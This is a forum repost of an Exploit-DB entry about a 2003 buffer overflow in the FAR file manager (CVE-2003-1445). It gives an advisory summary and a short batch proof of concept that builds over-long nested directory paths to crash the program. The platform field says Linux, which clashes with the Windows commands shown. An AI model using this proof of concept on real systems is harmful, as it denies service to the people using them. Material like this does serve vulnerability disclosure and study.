Exploit RARLAB FAR 1.65/1.70 - File Manager Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22243
Проверка EDB
  1. Пройдено
Автор
3APA3A
Тип уязвимости
DOS
Платформа
LINUX
CVE
cve-2003-1445
Дата публикации
2003-02-11
Код:
source: https://www.securityfocus.com/bid/6822/info

A buffer overflow vulnerability has been reported for FAR that may result in a denial of service condition. The vulnerability exists due to insufficient bounds checking performed by FAR when parsing directory paths. Specifically, when FAR attempts to parse overly long paths it will crash thereby resulting in a denial of service condition. 

SET A=A<260 chars>A
SET B=BBBBBBBBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%B%\
 
Источник
www.exploit-db.com

Похожие темы